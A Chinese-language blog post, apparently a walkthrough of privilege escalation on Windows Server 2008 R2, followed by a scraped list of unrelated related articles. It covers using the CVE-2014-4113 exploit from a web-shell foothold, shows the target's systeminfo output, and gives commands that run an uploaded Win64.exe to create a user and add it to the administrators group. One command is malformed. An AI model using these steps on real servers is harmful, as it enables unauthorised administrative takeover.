摘要

1、简介

在winserver2008 r2 中 服务器默认是支持aspx的。所以默认都是可以执行一些命令。

如果没有进行补丁修复可以利用一些溢出提权工具,进行提权。

2、CVE-2014-4113-Exploit

这个版本的提权工具 可以对winserver2008 的系统进行溢出提权

3、实战

systeminfo 这个命令查看系统信息的

主机名:          WIN-HRKJ54V1GSJ

OS 名称:         Microsoft Windows Web Server 2008 R2

OS 版本:         6.1.7601 Service Pack 1 Build 7601

OS 制造商:        MicrosoftCorporation

OS 配置:          独立服务器

OS 构件类型:     Multiprocessor Free

注册的所有人:    Windows 用户

注册的组织:

产品 ID:         00500-001-0000635-84743

初始安装日期:    2019/3/3, 16:24:34

系统启动时间:    2019/4/7, 17:14:40

系统制造商:      VMware, Inc.

系统型号:        VMware7,1

系统类型:        x64-based PC

处理器:          安装了 2 个处理器。

[01]: Intel64 Family 6 Model94 Stepping 3 GenuineIntel ~3408 Mhz

[02]: Intel64 Family 6 Model94 Stepping 3 GenuineIntel ~3408 Mhz

BIOS 版本:        VMware, Inc.VMW71.00V.6997262.B64.1710270607, 2017/10/27

Windows 目录:     C:\Windows

系统目录:        C:\Windows\system32

启动设备:        \Device\HarddiskVolume1

系统区域设置:    zh-cn;中文(中国)

输入法区域设置:  zh-cn;中文(中国)

时区:            (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐

物理内存总量:    4,095 MB

可用的物理内存:  2,939 MB

虚拟内存: 最大值: 8,188 MB

虚拟内存: 可用:   6,603 MB

虚拟内存: 使用中: 1,585 MB

页面文件位置:    C:\pagefile.sys

域:               WORKGROUP

登录服务器:      暂缺

修补程序:        安装了 2 个修补程序。

[01]: KB2999226

[02]: KB976902

网卡:            安装了 1 个 NIC。

[01]: Intel(R) 82574L GigabitNetwork Connection

连接名:      本地连接

启用 DHCP:   否

IP 地址

[01]: 192.168.0.105

[02]:fe80::986d:3564:19ad:2447

溢出成功

如果找不到可写目录 可以 使用遍历可写目录的脚本进行查找

增加用户

/c C:\inetpub\wwwroot\www.demo1.com\Win64.exe "net moonsec moonsec /add"

增加到用户组

/c C:\inetpub\wwwroot\www.demo1.com\Win64.exe "net localgroup administratorsmoonsec /add"

您可以选择一种方式赞助本站支付宝转账赞助

分享到各大网站

服务器2008系统提权工具,提权教程:winserver2008R2溢出提权相关推荐

  1. 腾讯云服务器linux远程登录,腾讯云服务器Linux系统使用SSH工具登录远程教程

    对于大部分网友而言,如果我们选择腾讯云服务器的时候系统用Windows,那大部分网友都会登录的,直接在我们平时使用的WIN电脑远程连接即可操作,而且对于这个可视化操作系统对于经常玩服务器的用户来说也不 ...

  2. 2008服务器系统怎么备份,服务器2008系统备份

    服务器2008系统备份 内容精选 换一换 云备份(Cloud Backup and Recovery,CBR)可以为云服务器.云硬盘提供简单易用的备份服务,当发生病毒入侵.人为误删除.软硬件故障等事件 ...

  3. 阿里云服务器镜像系统怎么选择?超详细教程

    阿里云服务器镜像怎么选择?云服务器操作系统镜像分为Linux和Windows两大类,Linux可以选择Alibaba Cloud Linux,Windows可以选择Windows Server 202 ...

  4. 服务器2008系统镜像,云服务器2008r2镜像

    云服务器2008r2镜像 内容精选 换一换 为了保证使用私有镜像创建的新云服务器可以实现一键式重置密码功能(参见"在控制台重置云服务器密码"了解更多),建议您在创建私有镜像前安装密 ...

  5. i服务器2008系统,Windows Server 2008多路径 I/O 概述

    Windows Server® 2008 包括许多将运行 Windows 服务器级操作系统的计算机与存储区域网络 (SAN) 设备连接起来的增强功能. 集成的多路径 I/O (MPIO) 支持是为基于 ...

  6. 曙光服务器2008系统,在中科曙光I620-G20服務器上安裝Windows 2008 R2 系統步驟

    [在此處輸入文章標題] 在中科曙光I620-G20服務器上安裝Windows 2008 R2 系統步驟 1.制作啟動盤 下載windows 2008 R2系統鏡像文件.使用UltraISO(軟碟通)工 ...

  7. U盘安装服务器2008系统蓝屏,U盘安装系统造成蓝屏如何解决

    如今电脑装系统普遍都使用U盘作为工具,在使用U盘安装系统的过程中我们总会遇到各种各样的问题,而其中最突出的问题要属蓝屏了,当然U盘安装系统造成的蓝屏原因也比较多,可能是U盘启动没有制作好的原因,可能是 ...

  8. 服务器2008系统 stop c0000218,电脑开机出现stop:c0000218unknowharderrorunknownharderror是为什么该怎么处理?...

    如何诊断 Stop 0xC0000218 错误 这篇文章中的信息适用于: Microsoft Windows XP Home Edition Microsoft Windows XP Professi ...

  9. 服务器2008系统usb驱动,用于增加 Windows 7 和 Windows Server 2008 R2 中最大 USB 传输大小的驱动程序更新...

    修补程序信息 Microsoft 提供了一个受支持的修补程序.但此修补程序只用于更正本文中描述的问题.仅将此修补程序应用于出现文本中所描述问题的系统.此修补程序可能还会接受进一步的测试.因此,如果这个 ...

  10. 域服务器2008系统密码忘记了,如何在Server 2008 R2上重置您忘记的域管理员密码 | MOS86...

    忘记密码总是很痛苦,但幸运的是,您可以轻松地重新设置您的域名管理员密码.所有您需要的是Windows Server 2008 R2安装盘的一个副本和一个简单的命令行技巧. 替换Utilman.可执行程 ...

最新文章

  1. python画三维立体图-python_matplotlib画三维图
  2. java闭锁_java8中CountDownLatch闭锁
  3. 20111228_给窗体设置默认输入法
  4. Python实现简单的学生管理系统
  5. c语言贪吃蛇_C语言贪吃蛇完整代码
  6. String的点点滴滴
  7. Linux学习笔记018---Centos7 下安装JDK1.8
  8. CSS侦测方法(侦测是否支持某个CSS属性)
  9. 服务器芯片封装,【芯极速】干货|一文看懂集成电路芯片封装及芯片组!
  10. HTB分层令牌桶排队规则分析
  11. 融合VOI与VDI、IDV、RDS,实现弹性的应用
  12. 使用exe4j+inno setup打包exe文件踩坑记录
  13. c语言中wait用法及意思,wait的用法总结大全
  14. 【BZOJ1123】[POI2008]BLO【割顶】
  15. [读书笔记] 代码整洁之道(一)
  16. 【知识分享】C语言中的设计模式——解释器
  17. 推荐几个Google Sitemap工具
  18. FLIN(2018 ISCA)
  19. 安卓系统的发展历程?
  20. 解决电脑独立显卡突然消失的问题

热门文章

  1. matlab R2021b 激活错误
  2. 若依框架使用总结说明
  3. 计算机操作系统---高响应比调度算法,操作系统最高响应比优先调度算法实验报告...
  4. 网站可行性报告范文_洛阳做可行性报告本地立项范文
  5. 图像处理之matlab中imnoise函数用法详解
  6. JAVA王思聪吃热狗程序_王思聪吃热狗小游戏, 程序员开发路上
  7. spnc币吧_CCIEC币-目前是CPUsolo独自开采。CPU服务器独自开采钱包上挖新币教程!...
  8. PLSQL下载及安装
  9. 五笔字根表识别码图_五笔字根表
  10. C实现NV12转I420